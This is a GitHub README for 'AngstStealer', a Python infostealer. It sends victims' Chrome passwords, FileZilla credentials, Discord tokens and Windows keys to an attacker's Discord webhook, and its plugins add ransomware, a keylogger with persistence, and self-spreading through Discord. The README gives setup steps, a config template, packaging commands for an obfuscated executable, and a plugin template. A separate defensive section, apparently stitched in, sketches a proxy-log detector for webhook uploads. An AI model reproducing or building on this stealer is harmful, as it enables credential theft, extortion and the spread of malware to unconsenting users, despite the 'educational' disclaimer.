/AngstStealer

A fully fledged stealer which utilizes Discord as a server for sending valuable information such as Chrome passwords, FileZilla logs, Discord tokens, and more.

Primary language: Python. License: MIT.

Angst Stealer

AngstStealer is a POC malware designed to highlight and utilize Discord as an attack vector. While it is fully functioning, it was created for educational purposes; please do not misuse this tool. Angst Stealer currently has a total of 6 plugins:

| Plugin | Description |
| --- | --- |
| Chrome | Dumps all of the user's passwords, websites, and usernames. |
| Filezilla | Checks whether the user has FileZilla installed; if so, dumps stored FileZilla creds. |
| Ransomware | Encrypts all files on the victim's computer and drops a note. |
| Discord | Dumps the Discord token for Chrome and Discord. |
| Send | Zips and sends all the files through the Discord webhook. |
| User | Drops user data about the victim such as IP, Username and Computername. |
| Windows | Also drops the Windows activation key for the victim's computer. |

| Unofficial | Description |
| --- | --- |
| Post Exploitation | Persistence + keylogger, file dropper included. Author: TheDebianGuy |
| Discord Spreader | Sends itself in all servers the user is in. Author: TheDebianGuy Idea: char#9249 |
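For defenders, the behaviour listed above (a public-IP lookup followed by a zipped upload through a Discord webhook) leaves a recognisable trail in web-proxy logs. The following is an added example, not part of the AngstStealer repository: it scores webhook POSTs in a constructed log, assuming a TLS-inspecting proxy that records full URLs. The log format, client names, thresholds and function names are hypothetical.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Discord webhook URLs: https://discord.com/api/webhooks/<id>/<token>
# (also discordapp.com, canary./ptb. hosts, and versioned /api/vN/ paths).
WEBHOOK_RE = re.compile(
    r"^https://(?:(?:canary|ptb)\.)?discord(?:app)?\.com"
    r"/api/(?:v\d+/)?webhooks/\d+/[\w-]+", re.IGNORECASE)
IP_LOOKUP_HOSTS = {"api.ipify.org"}  # lookup service used in this page's plugin example
WINDOW = timedelta(minutes=5)        # assumed correlation window

# Constructed sample log: time, client, method, URL, bytes sent, user agent.
SAMPLE_LOG = """\
2024-05-01T10:00:01 ws-014 GET https://api.ipify.org/ 0 python-requests/2.31.0
2024-05-01T10:00:09 ws-014 POST https://discord.com/api/webhooks/123456789012345678/EXAMPLE-TOKEN 482133 python-requests/2.31.0
2024-05-01T10:02:00 ws-022 POST https://discord.com/api/v10/channels/42/messages 310 Mozilla/5.0
2024-05-01T10:03:00 ws-031 POST https://discordapp.com/api/webhooks/987654321098765432/EXAMPLE-TOKEN-2 212 ci-notifier/1.0
"""

def find_webhook_uploads(log_text, min_bytes=100_000):
    """Return one alert per webhook POST, highest score first."""
    last_lookup = {}  # client -> time of its latest public-IP lookup
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, sent, agent = line.split(maxsplit=5)
        ts = datetime.fromisoformat(ts)
        if urlsplit(url).hostname in IP_LOOKUP_HOSTS:
            last_lookup[client] = ts
            continue
        if method != "POST" or not WEBHOOK_RE.match(url):
            continue
        reasons = ["POST to Discord webhook"]
        seen = last_lookup.get(client)
        if seen is not None and timedelta(0) <= ts - seen <= WINDOW:
            reasons.append("public-IP lookup shortly before")
        if int(sent) >= min_bytes:
            reasons.append("large upload")
        # The URL is left out of the alert: the webhook token in it is a secret.
        alerts.append({"client": client, "time": ts.isoformat(), "agent": agent,
                       "score": len(reasons), "reasons": reasons})
    return sorted(alerts, key=lambda a: -a["score"])

if __name__ == "__main__":
    for alert in find_webhook_uploads(SAMPLE_LOG):
        print(alert)
```

A score of 1 is common for legitimate notifier integrations, so an allow-list of known webhook IDs per client keeps the higher-scoring alerts meaningful.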

Setup

  1. Install python here
  2. Clone this repo using git clone https://github.com/backslash/AngstStealer or manually download it.
  3. Run cd folderpath so that you are inside the directory itself.
  4. Install the required libraries using pip install -r requirements.txt
  5. Inside the main file you will see a config template, modify it so it matches your requirements.
CONFIG = {
    "webhook" : "",
    "software": {
        "chrome" : True,
        "chromecookies": True,
        "filezilla": True,
        "discord": True,
        "screenshot": True,
        "windows": True,
        "postexploit": True,
        "discordspread": True
    }
}

webhook -> The Discord webhook link which you want it to use.
chrome -> Whether it should include Chrome passwords.
filezilla -> Whether it should include possible saved FileZilla passwords.
windows -> Gives information about your victim and includes the Windows key.
discord -> Steals Discord tokens.
screenshot -> Takes a screenshot.
postexploit -> Persistence with keylogger.
discordspread -> Sends itself in all servers the user is in.

  6. Run one of the commands listed below. Note that pyarmor will sometimes corrupt the executable, so if you plan on using the pyarmor command, test it locally to make sure it works.
PYINSTALLER: pyinstaller --onefile --hidden-import=pkg_resources.py2_warn angst.py
PYARMOR: pyarmor pack -e " --onefile --hidden-import=pkg_resources.py2_warn" angst.py

To Do List

  • Add cookie support (just got lazy and forgot)
  • Add more browsers
  • Implement some anti-vm tricks.
  • Add more plugins

Adding Plugins

Adding custom plugins is incredibly easy, here is a short example of how you make and integrate your own custom plugin for Angst:

  1. First, create your plugin, preferably in your plugins folder. The plugin can have as many functions as needed; the example below has one function called retrieve_data, which retrieves the sensitive data. The dump function is needed for proper plugin integration, because it is how every plugin hands back its data.
import requests

class ExamplePlugin(object):
	def __init__(self):
		self.sensitive_data = ""

	def retrieve_data(self):
		# Look up the machine's public IP address.
		view_website = requests.get("https://api.ipify.org")
		# Store it on the attribute that dump() returns.
		self.sensitive_data = view_website.text

	def dump(self):
		# Entry point called for every plugin.
		self.retrieve_data()
		return self.sensitive_data
  2. Next, add the example plugin to the main file, angst.py: add from plugins.exampleplugin import ExamplePlugin, changing the import to match whatever you named your file and your plugin class.
  3. Lastly, add it to config["software"] and to self.plugins as shown below.
    "software": {
        "chrome" : True,
        "chromecookies": True,
        "filezilla": True,
        "discord": True,
        "screenshot": True,
        "windows": True,
        "postexploit": True,
        "discordspread": True
    }
self.plugins = {
            "chrome": Chrome(),
            "chromecookies": Cookies(),
            "filezilla": Filezilla(),
            "discord": Discord(),
            "screenshot": Screenshot(),
            "windows": Windows(),
            "postexploit": PostExploit()
        }

Make sure you use the exact same name when you put it under the config and self.plugins since it is case sensitive.

Additional

Use this responsibly; I made this just as a demonstration of a POC. The fact that Discord still hasn't implemented any safeguards or preventive measures when it comes to something like this is kind of embarrassing. Regardless though, using this without the consent of the computer owner is illegal.